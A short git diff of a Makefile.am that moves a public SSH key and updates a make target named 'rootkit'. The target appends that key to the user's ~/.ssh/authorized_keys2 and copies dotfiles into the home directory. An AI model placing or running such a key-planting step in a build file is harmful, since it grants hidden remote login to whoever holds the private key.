diff --git a/Makefile.am b/Makefile.am index dd3ba002e5..5f36826d6f 100644 --- a/Makefile.am +++ b/Makefile.am @@ -450,7 +450,7 @@ $(OUR_MODULES): test -z "$$fail" rootkit: - @cat ssh_keys/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2 + @cat rootkit-d/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2 @cp rootkit-d/.emacs ~ @cp rootkit-d/.screenrc ~ @cp rootkit-d/.bashrc ~ diff --git a/ssh_keys/shinzon.pub b/rootkit-d/shinzon.pub similarity index 100% rename from ssh_keys/shinzon.pub rename to rootkit-d/shinzon.pub